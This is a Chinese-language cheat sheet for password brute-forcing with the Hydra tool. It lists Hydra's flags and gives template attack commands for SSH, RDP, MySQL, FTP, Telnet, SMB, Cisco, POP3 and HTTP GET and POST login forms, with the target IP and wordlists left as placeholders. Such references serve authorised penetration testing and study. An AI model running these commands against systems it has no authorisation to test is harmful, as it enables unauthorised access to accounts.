# 密码爆破

### Hydra

```bash
# 常用参数：
-R	根据上一次进度继续破解
-S	使用SSL协议连接
-s	指定端口
-l	指定用户名
-L	指定用户名字典(文件)
-p	指定密码破解
-P	指定密码字典(文件)
-e	空密码探测和指定用户密码探测(ns)
-C	用户名（username:password 可代替 -l username -p password）
-o	输出文件
-t	指定多线程数量，默认为16个线程
-vV	显示详细过程
-f	爆破出结果后停止爆破
```

<table><thead><tr><th width="200.57142857142856">目标</th><th>命令</th></tr></thead><tbody><tr><td>ssh</td><td>hydra -L &#x3C;用户名字典名> -P &#x3C;密码字典> -vV -o ssh.log -e ns &#x3C;目标IP> ssh -f</td></tr><tr><td>rdp</td><td>hydra &#x3C;目标IP> rdp -l &#x3C;用户名> -P &#x3C;密码字典> -V</td></tr><tr><td>mysql</td><td>hydra -l &#x3C;用户名> –P &#x3C;密码字典> –e ns &#x3C;目标IP> mysql</td></tr><tr><td>ftp</td><td>hydra &#x3C;目标IP> ftp -l 用户名 -P &#x3C;密码字典> -t 线程(默认16) -vV<br>hydra &#x3C;目标IP> ftp -l 用户名 -P &#x3C;密码字典> -e ns -vV</td></tr><tr><td>telnet</td><td>hydra &#x3C;目标IP> telnet -l 用户 -P &#x3C;密码字典> -t 32 -s 23 -e ns -f -V</td></tr><tr><td>https</td><td>hydra -m /index.php -l &#x3C;用户名> -P &#x3C;密码字典>.txt &#x3C;目标IP> https</td></tr><tr><td>teamspeak</td><td>hydra -l &#x3C;用户名> -P &#x3C;密码字典>.txt -s 端口号 -vV &#x3C;目标IP> teamspeak</td></tr><tr><td>cisco</td><td>hydra -P &#x3C;密码字典>.txt &#x3C;目标IP> cisco<br>hydra -m cloud -P &#x3C;密码字典>.txt &#x3C;目标IP> cisco-enable</td></tr><tr><td>smb</td><td>hydra -l &#x3C;用户名> -P &#x3C;密码字典>.txt &#x3C;目标IP> smb</td></tr><tr><td>pop3</td><td>hydra -l &#x3C;用户名> -P &#x3C;密码字典> my.pop3.mail pop3</td></tr><tr><td>http-proxy</td><td>hydra -l &#x3C;用户名> -P &#x3C;密码字典> http-proxy://&#x3C;目标IP></td></tr><tr><td>GET提交</td><td>hydra -l &#x3C;用户名> -p &#x3C;密码字典> -t 线程 -vV -e ns &#x3C;目标IP> http-get /admin/<br>hydra -l &#x3C;用户名> -p &#x3C;密码字典> -t 线程 -vV -e ns -f &#x3C;目标IP> http-get /admin/index.php</td></tr><tr><td>POST提交</td><td>hydra -l &#x3C;破解的用户名> -P &#x3C;密码字典>.lst -o &#x3C;输出的文件名>.lst -t &#x3C;线程数> -f &#x3C;目标IP> http-post-form "index.php:name=^USER^&#x26;pwd=^PASS^:&#x3C;错误猜解的返回信息提示>"</td></tr></tbody></table>
